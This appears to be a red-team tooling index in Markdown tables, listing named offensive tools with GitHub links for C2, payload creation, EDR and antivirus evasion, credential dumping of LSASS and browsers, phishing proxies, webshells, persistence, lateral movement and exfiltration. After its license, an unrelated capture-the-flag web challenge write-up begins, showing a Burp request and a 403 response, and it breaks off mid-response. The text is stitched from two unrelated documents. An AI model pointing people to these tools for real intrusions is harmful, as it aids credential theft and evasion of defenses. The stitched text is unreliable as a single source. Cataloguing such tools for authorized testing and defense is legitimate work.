|Ruler|Ruler is a tool that allows you to interact with Exchange servers remotely, through either the MAPI/HTTP or RPC/HTTP protocol.|https://github.com/sensepost/ruler|
|DueDLLigence|Shellcode runner framework for application whitelisting bypasses and DLL side-loading. The shellcode included in this project spawns calc.exe.|https://github.com/fireeye/DueDLLigence|
|RuralBishop|RuralBishop is practically a carbon copy of UrbanBishop by b33f, but all P/Invoke calls have been replaced with D/Invoke.|https://github.com/rasta-mouse/RuralBishop|
|TikiTorch|TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process, allocates a region of memory, then uses CreateRemoteThread to run the desired shellcode within that target process. Both the process and shellcode are specified by the user.|https://github.com/rasta-mouse/TikiTorch|
|SharpShooter|SharpShooter is a payload creation framework for the retrieval and execution of arbitrary CSharp source code. SharpShooter is capable of creating payloads in a variety of formats, including HTA, JS, VBS and WSF.|https://github.com/mdsecactivebreach/SharpShooter|
|SharpSploit|SharpSploit is a .NET post-exploitation library written in C#|https://github.com/cobbr/SharpSploit|
|MSBuildAPICaller|MSBuild Without MSBuild.exe|https://github.com/rvrsh3ll/MSBuildAPICaller|
|macro_pack|macro_pack is a tool by @EmericNasi used to automatize obfuscation and generation of MS Office documents, VB scripts, and other formats for pentest, demo, and social engineering assessments.|https://github.com/sevagas/macro_pack|
|inceptor|Template-Driven AV/EDR Evasion Framework|https://github.com/klezVirus/inceptor|
|mortar|evasion technique to defeat and divert detection and prevention of security products (AV/EDR/XDR)|https://github.com/0xsp-SRD/mortar|
|ProtectMyTooling|Multi-Packer wrapper letting us daisy-chain various packers, obfuscators and other Red Team oriented weaponry. Featured with artifacts watermarking, IOCs collection & PE Backdooring. You feed it with your implant, it does a lot of sneaky things and spits out obfuscated executable.|https://github.com/mgeeky/ProtectMyTooling|
|Freeze|Freeze is a payload toolkit for bypassing EDRs using suspended processes, direct syscalls, and alternative execution methods|https://github.com/optiv/Freeze|
## Delivery
### Phishing
|Name|Description|URL|
|-----|-----------|----|
|o365-attack-toolkit|A toolkit to attack Office365|https://github.com/mdsecactivebreach/o365-attack-toolkit|
|Evilginx2|Evilginx2 is a man-in-the-middle attack framework used for phishing credentials and session cookies of any web service.|https://github.com/kgretzky/evilginx2|
|Gophish|Gophish is an open-source phishing toolkit designed for businesses and penetration testers. It provides the ability to quickly and easily setup and execute phishing engagements and security awareness training.|https://github.com/gophish/gophish|
|PwnAuth|PwnAuth a web application framework for launching and managing OAuth abuse campaigns.|https://github.com/fireeye/PwnAuth|
|Modlishka|Modlishka is a flexible and powerful reverse proxy, that will take your ethical phishing campaigns to the next level.|https://github.com/drk1wi/Modlishka|
### Watering Hole Attack
|Name|Description|URL|
|-----|-----------|----|
|BeEF|BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser|https://github.com/beefproject/beef|
## Command and Control
### Remote Access Tools (RAT)
|Name|Description|URL|
|-----|-----------|----|
|Cobalt Strike|Cobalt Strike is software for Adversary Simulations and Red Team Operations.|https://cobaltstrike.com/|
|Brute Ratel C4|Brute Ratel is the most advanced Red Team & Adversary Simulation Software in the current C2 Market.|https://bruteratel.com/|
|Empire|Empire 5 is a post-exploitation framework that includes a pure-PowerShell Windows agent, and compatibility with Python 3.x Linux/OS X agents.|https://github.com/BC-SECURITY/Empire|
|PoshC2|PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming, post-exploitation and lateral movement.|https://github.com/nettitude/PoshC2|
|Koadic|Koadic C3 COM Command & Control - JScript RAT|https://github.com/zerosum0x0/koadic|
|merlin|Merlin is a cross-platform post-exploitation Command & Control server and agent written in Go.|https://github.com/Ne0nd0g/merlin|
|Mythic|A cross-platform, post-exploit, red teaming framework built with python3, docker, docker-compose, and a web browser UI.|https://github.com/its-a-feature/Mythic|
|Covenant|Covenant is a .NET command and control framework that aims to highlight the attack surface of .NET, make the use of offensive .NET tradecraft easier, and serve as a collaborative command and control platform for red teamers.|https://github.com/cobbr/Covenant|
|shad0w|A post exploitation framework designed to operate covertly on heavily monitored environments|https://github.com/bats3c/shad0w|
|Sliver|Sliver is a general purpose cross-platform implant framework that supports C2 over Mutual-TLS, HTTP(S), and DNS.|https://github.com/BishopFox/sliver|
|SILENTTRINITY|An asynchronous, collaborative post-exploitation agent powered by Python and .NET's DLR|https://github.com/byt3bl33d3r/SILENTTRINITY|
|Pupy|Pupy is an opensource, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool mainly written in python|https://github.com/n1nj4sec/pupy|
|Havoc|Havoc is a modern and malleable post-exploitation command and control framework, created by @C5pider.|https://github.com/HavocFramework/Havoc|
|NimPlant|A light first-stage C2 implant written in Nim and Python|https://github.com/chvancooten/NimPlant|
|SharpC2|SharpC2 is a Command & Control (C2) framework written in C#. It consists of an ASP.NET Core Team Server, a .NET Framework implant, and a .NET MAUI client.|https://github.com/rasta-mouse/SharpC2|
### Staging
|Name|Description|URL|
|-----|-----------|----|
|pwndrop|Self-deployable file hosting service for red teamers, allowing to easily upload and share payloads over HTTP and WebDAV.|https://github.com/kgretzky/pwndrop|
|C2concealer|A command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.|https://github.com/FortyNorthSecurity/C2concealer|
|FindFrontableDomains|Search for potential frontable domains|https://github.com/rvrsh3ll/FindFrontableDomains|
|Domain Hunter|Checks expired domains for categorization/reputation and Archive.org history to determine good candidates for phishing and C2 domain names|https://github.com/threatexpress/domainhunter|
|RedWarden|Flexible CobaltStrike Malleable Redirector|https://github.com/mgeeky/RedWarden|
|AzureC2Relay|AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.|https://github.com/Flangvik/AzureC2Relay|
|C3|C3 (Custom Command and Control) is a tool that allows Red Teams to rapidly develop and utilise esoteric command and control channels (C2).|https://github.com/FSecureLABS/C3|
|Chameleon|A tool for evading Proxy categorisation|https://github.com/mdsecactivebreach/Chameleon|
|Cobalt Strike Malleable C2 Design and Reference Guide|Cobalt Strike Malleable C2 Design and Reference Guide|https://github.com/threatexpress/malleable-c2/|
|redirect.rules|Quick and dirty dynamic redirect.rules generator|https://github.com/0xZDH/redirect.rules|
|CobaltBus|Cobalt Strike External C2 Integration With Azure Servicebus, C2 traffic via Azure Servicebus|https://github.com/Flangvik/CobaltBus|
|SourcePoint|SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.|https://github.com/Tylous/SourcePoint|
|RedGuard|RedGuard is a C2 front flow control tool,Can avoid Blue Teams,AVs,EDRs check.|https://github.com/wikiZ/RedGuard|
|skyhook|A round-trip obfuscated HTTP file transfer setup built to bypass IDS detections.|https://github.com/blackhillsinfosec/skyhook|
### Log Aggregation
|Name|Description|URL|
|-----|-----------|----|
|RedELK|Red Team's SIEM - tool for Red Teams used for tracking and alarming about Blue Team activities as well as better usability in long term operations.|https://github.com/outflanknl/RedELK|
|Elastic for Red Teaming|Repository of resources for configuring a Red Team SIEM using Elastic.|https://github.com/SecurityRiskAdvisors/RedTeamSIEM|
|RedEye|RedEye is a visual analytic tool supporting Red & Blue Team operations|https://github.com/cisagov/RedEye|
## Situational Awareness
### Host Situational Awareness
|Name|Description|URL|
|-----|-----------|----|
|AggressiveProxy|AggressiveProxy is a combination of a .NET 3.5 binary (LetMeOutSharp) and a Cobalt Strike aggressor script (AggressiveProxy.cna). Once LetMeOutSharp is executed on a workstation, it will try to enumerate all available proxy configurations and try to communicate with the Cobalt Strike server over HTTP(s) using the identified proxy configurations.|https://github.com/EncodeGroup/AggressiveProxy|
|Gopher|C# tool to discover low hanging fruits|https://github.com/EncodeGroup/Gopher|
|SharpEDRChecker|Checks running processes, process metadata, Dlls loaded into your current process and the each DLLs metadata, common install directories, installed services and each service binaries metadata, installed drivers and each drivers metadata, all for the presence of known defensive products such as AV's, EDR's and logging tools.|https://github.com/PwnDexter/SharpEDRChecker|
|Situational Awareness BOF|This Repo intends to serve two purposes. First it provides a nice set of basic situational awareness commands implemented in BOF.|https://github.com/trustedsec/CS-Situational-Awareness-BOF|
|Seatbelt|Seatbelt is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives.|https://github.com/GhostPack/Seatbelt|
|SauronEye|SauronEye is a search tool built to aid red teams in finding files containing specific keywords.|https://github.com/vivami/SauronEye|
|SharpShares|Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain|https://github.com/mitchmoser/SharpShares|
|SharpAppLocker|C# port of the Get-AppLockerPolicy PowerShell cmdlet with extended features. Includes the ability to filter and search for a specific type of rules and actions.|https://github.com/Flangvik/SharpAppLocker/|
|SharpPrinter|Printer is a modified and console version of ListNetworks|https://github.com/rvrsh3ll/SharpPrinter|
### Domain Situational Awareness
|Name|Description|URL|
|-----|-----------|----|
|StandIn|StandIn is a small AD post-compromise toolkit. StandIn came about because recently at xforcered we needed a .NET native solution to perform resource based constrained delegation.|https://github.com/FuzzySecurity/StandIn|
|Recon-AD|An AD recon tool based on ADSI and reflective DLL’s|https://github.com/outflanknl/Recon-AD|
|BloodHound|Six Degrees of Domain Admin|https://github.com/BloodHoundAD/BloodHound|
|PSPKIAudit|PowerShell toolkit for auditing Active Directory Certificate Services (AD CS).|https://github.com/GhostPack/PSPKIAudit|
|SharpView|C# implementation of harmj0y's PowerView|https://github.com/tevora-threat/SharpView|
|Rubeus|Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpy's Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUX's MakeMeEnterpriseAdmin project (GPL v3.0 license). |https://github.com/GhostPack/Rubeus|
|nanorobeus|A minimalistic tool for managing Kerberos tickets. Supports redteam frameworks|https://github.com/wavvs/nanorobeus|
|Grouper|A PowerShell script for helping to find vulnerable settings in AD Group Policy. (deprecated, use Grouper2 instead!)|https://github.com/l0ss/Grouper|
|ImproHound|Identify the attack paths in BloodHound breaking your AD tiering|https://github.com/improsec/ImproHound|
|ADRecon|ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.|https://github.com/adrecon/ADRecon|
|ADCSPwn|A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts (Petitpotam) and relaying to the certificate service.|https://github.com/bats3c/ADCSPwn|
## Credential Dumping
|Name|Description|URL|
|-----|-----------|----|
|Mimikatz|Mimikatz is an open-source application that allows users to view and save authentication credentials like Kerberos tickets.|https://github.com/gentilkiwi/mimikatz|
|Dumpert|LSASS memory dumper using direct system calls and API unhooking.|https://github.com/outflanknl/Dumpert|
|CredBandit| CredBandit is a proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel.|https://github.com/xforcered/CredBandit|
|CloneVault|CloneVault allows a red team operator to export and import entries including attributes from Windows Credential Manager. |https://github.com/mdsecactivebreach/CloneVault|
|SharpLAPS|Retrieve LAPS password from LDAP|https://github.com/swisskyrepo/SharpLAPS|
|SharpDPAPI|SharpDPAPI is a C# port of some DPAPI functionality from @gentilkiwi's Mimikatz project.|https://github.com/GhostPack/SharpDPAPI|
|KeeThief|Allows for the extraction of KeePass 2.X key material from memory, as well as the backdooring and enumeration of the KeePass trigger system.|https://github.com/GhostPack/KeeThief|
|SafetyKatz|SafetyKatz is a combination of slightly modified version of @gentilkiwi's Mimikatz project and @subtee's .NET PE Loader.|https://github.com/GhostPack/SafetyKatz|
|forkatz|credential dump using forshaw technique using SeTrustedCredmanAccessPrivilege|https://github.com/Barbarisch/forkatz|
|PPLKiller|Tool to bypass LSA Protection (aka Protected Process Light)|https://github.com/RedCursorSecurityConsulting/PPLKiller|
|LaZagne|The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer.|https://github.com/AlessandroZ/LaZagne|
|AndrewSpecial|AndrewSpecial, dumping lsass' memory stealthily and bypassing "Cilence" since 2019.|https://github.com/hoangprod/AndrewSpecial|
|Net-GPPPassword|.NET implementation of Get-GPPPassword. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.|https://github.com/outflanknl/Net-GPPPassword|
|SharpChromium|.NET 4.0 CLR Project to retrieve Chromium data, such as cookies, history and saved logins.|https://github.com/djhohnstein/SharpChromium|
|Chlonium|Chlonium is an application designed for cloning Chromium Cookies.|https://github.com/rxwx/chlonium|
|SharpCloud|SharpCloud is a simple C# utility for checking for the existence of credential files related to Amazon Web Services, Microsoft Azure, and Google Compute.|https://github.com/chrismaddalena/SharpCloud|
|pypykatz|Mimikatz implementation in pure Python. At least a part of it :)|https://github.com/skelsec/pypykatz|
|nanodump|A Beacon Object File that creates a minidump of the LSASS process.|https://github.com/helpsystems/nanodump|
|Koh|Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.|https://github.com/GhostPack/Koh|
## Privilege Escalation
|Name|Description|URL|
|-----|-----------|----|
|ElevateKit|The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.|https://github.com/rsmudge/ElevateKit|
|Watson|Watson is a .NET tool designed to enumerate missing KBs and suggest exploits for Privilege Escalation vulnerabilities.|https://github.com/rasta-mouse/Watson|
|SharpUp|SharpUp is a C# port of various PowerUp functionality. Currently, only the most common checks have been ported; no weaponization functions have yet been implemented.|https://github.com/GhostPack/SharpUp|
|dazzleUP|A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems. dazzleUP detects the following vulnerabilities.|https://github.com/hlldz/dazzleUP|
|PEASS|Privilege Escalation Awesome Scripts SUITE (with colors)|https://github.com/carlospolop/PEASS-ng|
|SweetPotato|A collection of various native Windows privilege escalation techniques from service accounts to SYSTEM|https://github.com/CCob/SweetPotato|
|MultiPotato| Another Potato to get SYSTEM via SeImpersonate privileges |https://github.com/S3cur3Th1sSh1t/MultiPotato|
|KrbRelayUp|a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).|https://github.com/Dec0ne/KrbRelayUp|
|GodPotato|As Long as You Have the ImpersonatePrivilege Permission, Then You are the SYSTEM!|https://github.com/BeichenDream/GodPotato|
## Defense Evasion
|Name|Description|URL|
|-----|-----------|----|
|RefleXXion|RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc.|https://github.com/hlldz/RefleXXion|
|EDRSandBlast|EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections (Kernel callbacks and ETW TI provider) and LSASS protections.|https://github.com/wavestone-cdt/EDRSandblast|
|unDefender|Killing your preferred antimalware by abusing native symbolic links and NT paths.|https://github.com/APTortellini/unDefender|
|Backstab|A tool to kill antimalware protected processes|https://github.com/Yaxser/Backstab|
|SPAWN - Cobalt Strike BOF|Cobalt Strike BOF that spawns a sacrificial process, injects it with shellcode, and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG), BlockDll, and PPID spoofing.|https://github.com/boku7/spawn|
|BOF.NET - A .NET Runtime for Cobalt Strike's Beacon Object Files|BOF.NET is a small native BOF object combined with the BOF.NET managed runtime that enables the development of Cobalt Strike BOFs directly in .NET. BOF.NET removes the complexity of native compilation along with the headaches of manually importing native API.|https://github.com/CCob/BOF.NET|
|NetLoader|Loads any C# binary from filepath or url, patching AMSI and bypassing Windows Defender on runtime|https://github.com/Flangvik/NetLoader|
|FindObjects-BOF|A Cobalt Strike Beacon Object File (BOF) project which uses direct system calls to enumerate processes for specific modules or process handles.|https://github.com/outflanknl/FindObjects-BOF|
|SharpUnhooker|C# Based Universal API Unhooker - Automatically Unhook API Hives (ntdll.dll,kernel32.dll,user32.dll,advapi32.dll,and kernelbase.dll).|https://github.com/GetRektBoy724/SharpUnhooker|
|EvtMute|Apply a filter to the events being reported by windows event logging|https://github.com/bats3c/EvtMute|
|InlineExecute-Assembly|InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module|https://github.com/xforcered/InlineExecute-Assembly|
|Phant0m | Windows Event Log Killer|https://github.com/hlldz/Phant0m|
|SharpBlock|A method of bypassing EDR's active projection DLL's by preventing entry point execution.|https://github.com/CCob/SharpBlock|
|NtdllUnpatcher|Example code for EDR bypassing, please use this for testing blue team detection capabilities against this type of malware that will bypass EDR's userland hooks.|https://github.com/Kharos102/NtdllUnpatcher|
|DarkLoadLibrary|LoadLibrary for offensive operations.|https://github.com/bats3c/DarkLoadLibrary|
|BlockETW|.Net 3.5 / 4.5 Assembly to block ETW telemetry in a process|https://github.com/Soledge/BlockEtw|
|firewalker|This repo contains a simple library which can be used to add FireWalker hook bypass capabilities to existing code|https://github.com/mdsecactivebreach/firewalker|
|KillDefenderBOF|Beacon Object File PoC implementation of KillDefender|https://github.com/Cerbersec/KillDefenderBOF|
|Mangle|Mangle is a tool that manipulates aspects of compiled executables (.exe or DLL) to avoid detection from EDRs|https://github.com/optiv/Mangle|
|AceLdr|Cobalt Strike UDRL for memory scanner evasion.|https://github.com/kyleavery/AceLdr|
|AtomLdr|CA DLL loader with advanced evasive features|https://github.com/NUL0x4C/AtomLdr|
|Inline-Execute-PE|Execute unmanaged Windows executables in CobaltStrike Beacons|https://github.com/Octoberfest7/Inline-Execute-PE|
|SigFlip|SigFlip is a tool for patching authenticode signed PE files (exe, dll, sys ..etc) without invalidating or breaking the existing signature.|https://github.com/med0x2e/SigFlip|
|Blackout|kill anti-malware protected processes (BYOVD)|https://github.com/ZeroMemoryEx/Blackout|
## Persistence
|Name|Description|URL|
|-----|-----------|----|
|SharpStay|.NET project for installing Persistence|https://github.com/0xthirteen/SharpStay|
|SharPersist|Windows persistence toolkit written in C#.|https://github.com/fireeye/SharPersist|
|SharpHide|Tool to create hidden registry keys.|https://github.com/outflanknl/SharpHide|
|DoUCMe|This leverages the NetUserAdd Win32 API to create a new computer account. This is done by setting the usri1_priv of the USER_INFO_1 type to 0x1000.|https://github.com/Ben0xA/DoUCMe|
|A Black Path Toward The Sun|(TCP tunneling over HTTP for web application servers)|https://github.com/nccgroup/ABPTTS|
|pivotnacci|A tool to make socks connections through HTTP agents|https://github.com/blackarrowsec/pivotnacci|
|reGeorg|The successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.|https://github.com/sensepost/reGeorg|
|DAMP|The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.|https://github.com/HarmJ0y/DAMP|
|IIS-Raid|A native backdoor module for Microsoft IIS (Internet Information Services)|https://github.com/0x09AL/IIS-Raid|
|SharPyShell|tiny and obfuscated ASP.NET webshell for C# web applications|https://github.com/antonioCoco/SharPyShell|
|ScheduleRunner|A C# tool with more flexibility to customize scheduled task for both persistence and lateral movement in red team operation|https://github.com/netero1010/ScheduleRunner|
|SharpEventPersist|Persistence by writing/reading shellcode from Event Log|https://github.com/improsec/SharpEventPersist|
|Kraken|Kraken, a modular multi-language webshell coded by @secu_x11.|https://github.com/kraken-ng/Kraken|
|HiddenDesktop|HVNC for Cobalt Strike|https://github.com/WKL-Sec/HiddenDesktop|
## Lateral Movement
|Name|Description|URL|
|-----|-----------|----|
|Liquid Snake|LiquidSnake is a tool that allows operators to perform fileless lateral movement using WMI Event Subscriptions and GadgetToJScript|https://github.com/RiccardoAncarani/LiquidSnake|
|PowerUpSQL|A PowerShell Toolkit for Attacking SQL Server|https://github.com/NetSPI/PowerUpSQL|
|SQLRecon|A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation.|https://github.com/skahwah/SQLRecon|
|SCShell|Fileless lateral movement tool that relies on ChangeServiceConfigA to run command|https://github.com/Mr-Un1k0d3r/SCShell|
|SharpRDP|Remote Desktop Protocol Console Application for Authenticated Command Execution|https://github.com/0xthirteen/SharpRDP|
|MoveKit|Movekit is an extension of built in Cobalt Strike lateral movement by leveraging the execute_assembly function with the SharpMove and SharpRDP .NET assemblies.|https://github.com/0xthirteen/MoveKit|
|SharpNoPSExec|File less command execution for lateral movement.|https://github.com/juliourena/SharpNoPSExec|
|Responder/MultiRelay|LLMNR/NBT-NS/mDNS Poisoner and NTLMv1/2 Relay.|https://github.com/lgandx/Responder|
|impacket|Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself.|https://github.com/SecureAuthCorp/impacket|
|Farmer|Farmer is a project for collecting NetNTLM hashes in a Windows domain. |https://github.com/mdsecactivebreach/Farmer|
|CIMplant|C# port of WMImplant which uses either CIM or WMI to query remote systems. It can use provided credentials or the current user's session.|https://github.com/FortyNorthSecurity/CIMplant|
|PowerLessShell|PowerLessShell rely on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. You can also execute raw shellcode using the same approach.|https://github.com/Mr-Un1k0d3r/PowerLessShell|
|SharpGPOAbuse|SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.|https://github.com/FSecureLABS/SharpGPOAbuse|
|kerbrute|A tool to quickly bruteforce and enumerate valid Active Directory accounts through Kerberos Pre-Authentication|https://github.com/ropnop/kerbrute|
|mssqlproxy|mssqlproxy is a toolkit aimed to perform lateral movement in restricted environments through a compromised Microsoft SQL Server via socket reuse|https://github.com/blackarrowsec/mssqlproxy|
|Invoke-TheHash|PowerShell Pass The Hash Utils|https://github.com/Kevin-Robertson/Invoke-TheHash|
|InveighZero|.NET IPv4/IPv6 machine-in-the-middle tool for penetration testers|https://github.com/Kevin-Robertson/InveighZero|
|SharpSpray|SharpSpray a simple code set to perform a password spraying attack against all users of a domain using LDAP and is compatible with Cobalt Strike.|https://github.com/jnqpblc/SharpSpray|
|CrackMapExec|A swiss army knife for pentesting networks|https://github.com/byt3bl33d3r/CrackMapExec|
|SharpAllowedToAct|A C# implementation of a computer object takeover through Resource-Based Constrained Delegation (msDS-AllowedToActOnBehalfOfOtherIdentity) based on the research by @elad_shamir.|https://github.com/pkb1s/SharpAllowedToAct|
|SharpRDPHijack|Sharp RDP Hijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions|https://github.com/bohops/SharpRDPHijack|
|CheeseTools|This repository has been made basing onto the already existing MiscTool, so big shout-out to rasta-mouse for releasing them and for giving me the right motivation to work on them.|https://github.com/klezVirus/CheeseTools|
|SharpSpray|SharpSpray is a Windows domain password spraying tool written in .NET C#.|https://github.com/iomoath/SharpSpray|
|MalSCCM|This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage.|https://github.com/nettitude/MalSCCM
|Coercer|A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through 9 methods.|https://github.com/p0dalirius/Coercer|
|SharpSploit|SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.|https://github.com/cobbr/SharpSploit|
|orpheus|Bypassing Kerberoast Detections with Modified KDC Options and Encryption Types|https://github.com/trustedsec/orpheus|
|Chisel|Chisel is a fast TCP/UDP tunnel, transported over HTTP, secured via SSH. Single executable including both client and server.|https://github.com/jpillora/chisel|
|frp|frp is a fast reverse proxy that allows you to expose a local server located behind a NAT or firewall to the Internet.|https://github.com/fatedier/frp|
## Exfiltration
|Name|Description|URL|
|-----|-----------|----|
|SharpExfiltrate|Modular C# framework to exfiltrate loot over secure and trusted channels.|https://github.com/Flangvik/SharpExfiltrate|
|DNSExfiltrator|Data exfiltration over DNS request covert channel|https://github.com/Arno0x/DNSExfiltrator|
|Egress-Assess|Egress-Assess is a tool used to test egress data detection capabilities.|https://github.com/FortyNorthSecurity/Egress-Assess|
## Miscellaneous
### Threat-informed Defense
|Name|Description|URL|
|-----|-----------|----|
|Tidal Cyber|Tidal Cyber helps enterprise organizations to define, measure, and improve their defenses to address the adversary behaviors that are most important to them.|https://app.tidalcyber.com|
|Control Validation Compass|Threat modeling aide & purple team content repository, pointing security & intelligence teams to 10,000+ publicly-accessible technical and policy controls and 2,100+ offensive security tests, aligned with nearly 600 common attacker techniques|https://controlcompass.github.io|
### Cloud
#### Amazon Web Services (AWS)
|Name|Description|URL|
|-----|-----------|----|
|pacu|The AWS exploitation framework, designed for testing the security of Amazon Web Services environments.|https://github.com/RhinoSecurityLabs/pacu|
|CloudMapper|CloudMapper helps you analyze your Amazon Web Services (AWS) environments.|https://github.com/duo-labs/cloudmapper|
|Enumerate IAM permissions|Enumerate the permissions associated with AWS credential set|https://github.com/andresriancho/enumerate-iam|
#### Azure
|Name|Description|URL|
|-----|-----------|----|
|Azure AD Connect password extraction|This toolkit offers several ways to extract and decrypt stored Azure AD and Active Directory credentials from Azure AD Connect servers.|https://github.com/fox-it/adconnectdump|
|Storm Spotter|Azure Red Team tool for graphing Azure and Azure Active Directory objects|https://github.com/Azure/Stormspotter|
|ROADtools|The Azure AD exploration framework.|https://github.com/dirkjanm/ROADtools|
|MicroBurst: A PowerShell Toolkit for Attacking Azure|A collection of scripts for assessing Microsoft Azure security|https://github.com/NetSPI/MicroBurst|
|AADInternals|AADInternals PowerShell module for administering Azure AD and Office 365|https://github.com/Gerenios/AADInternals|
|TeamFiltration|TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts.|https://github.com/Flangvik/TeamFiltration|
|MAAD Attack Framework|An attack tool for simple, fast & effective security testing of M365 & Azure AD.|https://github.com/vectra-ai-research/MAAD-AF|
### Adversary Emulation
|Name|Description|URL|
|-----|-----------|----|
|Stratus Red Team|Stratus Red Team is "Atomic Red Team™" for the cloud, allowing to emulate offensive attack techniques in a granular and self-contained manner.|https://github.com/DataDog/stratus-red-team|
|Prelude Operator|A Platform for Developer-first advanced security· Defend your organization by mimicking real adversarial attacks.|https://www.preludesecurity.com/products/operator|
|Prelude Build|An open source IDE for authoring, testing, and verifying production-ready security tests..|https://www.preludesecurity.com/products/build|
|Caldera|An automated adversary emulation system that performs post-compromise adversarial behavior within Windows Enterprise networks.|https://github.com/mitre/caldera|
|APTSimulator|A Windows Batch script that uses a set of tools and output files to make a system look as if it was compromised.|https://github.com/NextronSystems/APTSimulator|
|Atomic Red Team|Small and highly portable detection tests mapped to the Mitre ATT&CK Framework.|https://github.com/redcanaryco/atomic-red-team|
|Network Flight Simulator|flightsim is a lightweight utility used to generate malicious network traffic and help security teams to evaluate security controls and network visibility.|https://github.com/alphasoc/flightsim|
|Metta|A security preparedness tool to do adversarial simulation.|https://github.com/uber-common/metta|
|Red Team Automation (RTA)| RTA provides a framework of scripts designed to allow blue teams to test their detection capabilities against malicious tradecraft, modeled after MITRE ATT&CK.|https://github.com/endgameinc/RTA|
### Living Off the Living Off the Land
|Name|Description|URL|
|-----|-----------|----|
|Living Off The Land Drivers|Living Off The Land Drivers is a curated list of Windows drivers used by adversaries to bypass security controls and carry out attacks|https://www.loldrivers.io/|
|GTFOBins|GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems|https://gtfobins.github.io|
|LOLBAS|The goal of the LOLBAS project is to document every binary, script, and library that can be used for Living Off The Land techniques|https://lolbas-project.github.io/|
|Living Off Trusted Sites (LOTS) Project|Attackers are using popular legitimate domains when conducting phishing, C&C, exfiltration and downloading tools to evade detection. The list of websites below allow attackers to use their domain or subdomain|https://lots-project.com|
|Filesec|Stay up-to-date with the latest file extensions being used by attackers.|https://filesec.io/|
|LOOBins|Living Off the Orchard: macOS Binaries (LOOBins) is designed to provide detailed information on various built-in macOS binaries and how they can be used by threat actors for malicious purposes.|https://www.loobins.io/|
|WTFBins|WTFBin(n): a binary that behaves exactly like malware, except, somehow, it's not? This project aims to catalogue benign applications that exhibit suspicious behavior. These binaries can emit noise and false positives in threat hunting and automated detections.|https://wtfbins.wtf/|
|Hijack Libs|This project provides an curated list of DLL Hijacking candidates|https://hijacklibs.net|
### Red Team Scripts
|Name|Description|URL|
|-----|-----------|----|
|RedTeamCCode|Red Team C code repo|https://github.com/Mr-Un1k0d3r/RedTeamCCode|
|EDRs|This repo contains information about EDRs that can be useful during red team exercise.|https://github.com/Mr-Un1k0d3r/EDRs|
|Cobalt Strike Community Kit|Community Kit is a central repository of extensions written by the user community to extend the capabilities of Cobalt Strike.|https://cobalt-strike.github.io/community_kit/|
### Red Team Infrastructure
|Name|Description|URL|
|-----|-----------|----|
|Red Team Infrastructure Wiki|Wiki to collect Red Team infrastructure hardening resources|https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki|
## License
[![CC0](http://mirrors.creativecommons.org/presskit/buttons/88x31/svg/cc-zero.svg)](http://creativecommons.org/publicdomain/zero/1.0)
To the extent possible under law, Rahmat Nurfauzi "@infosecn1nja" has waived all copyright and related or neighboring rights to this work.
|
# WEB CHALLENGE: GRAMMAR
## Challenge Description
When we access this page we get a Forbidden error. However we believe that something strange lies behind... Can you find a way in and retrieve the flag?
```
host: 88.198.233.174 port:37337
```
<img src="forbidden.jpg" width=500px/>
### BURPSUITE
Let's see what does burpsuite tell us..
```
<REQUEST>
GET / HTTP/1.1
Host: 88.198.233.174:37337
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
</REQUEST>
```
```
<RESPONSE>
HTTP/1.1 403 Forbidden
Date: Wed, 27 Dec 2017 07:36:52 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 292
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
